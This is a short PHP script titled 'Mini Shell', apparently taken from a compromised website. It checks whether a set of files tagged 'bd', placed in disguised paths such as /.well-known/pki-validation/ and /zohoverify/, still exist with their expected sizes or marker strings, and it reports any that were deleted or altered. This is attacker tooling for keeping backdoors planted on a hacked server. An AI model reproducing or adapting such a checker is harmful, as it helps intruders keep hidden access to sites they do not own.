Mini Shell
<?php $r = '/home/ukubnwwt/airlev8.com'; $x = ["/zohoverify/xoopsstory.php"=>"bd@@212151@@77",
"/.well-known/pki-validation/sched_ranking.php"=>"bd@@211046@@51",
"/.well-known/pki-validation/sched_ranking.php"=>"bd@@210273@@599",
"/rester/index.php"=>"bd@@204411@@reverse_lookup",
"/zohoverify/xoopsstory.php"=>"bd@@211654@@709",
"/rester/DB.php"=>"bd@@212196@@1604"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');